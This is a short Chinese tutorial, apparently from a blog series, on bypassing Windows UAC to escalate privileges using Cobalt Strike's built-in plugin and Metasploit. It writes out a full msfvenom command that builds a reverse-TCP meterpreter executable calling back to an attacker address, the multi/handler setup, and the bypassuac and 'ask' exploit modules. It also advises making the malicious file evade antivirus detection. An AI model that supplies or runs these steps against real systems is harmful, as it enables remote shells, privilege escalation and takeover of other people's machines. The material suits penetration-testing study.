操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权
系列文章
操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述
注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!
MSF和CS绕过UAC提权
CS绕过UAC提权
拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC
执行添加用户的命令时显示拒绝访问
使用CS自带的插件进行绕过提权
直接提到了system权限
提权后可以完成添加用户的命令
MSF绕过UAC
bypassuac模块
使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置
生成一个MSF的SHELL
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -f exe -o test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 3333
exploit
getuid
试一下getsystem发现失败
msf搜索 bypassuac 得到很多模块
search bypassuac
使用一个模块试一试
RUNAS模块绕过UAC
该模块会创建一个可执行文件,目标机器会运行一个发起提升权限请求的程序,提示用户是否要继续运行,如果用户选择继续运行程序,就会返回一个system权限的shell
这个模块对用户没有要求,点击通过即可,但是会创建一个恶意文件,对该文件进行免杀即可
use exploit/windows/local/ask
用户点击后直接获取高权限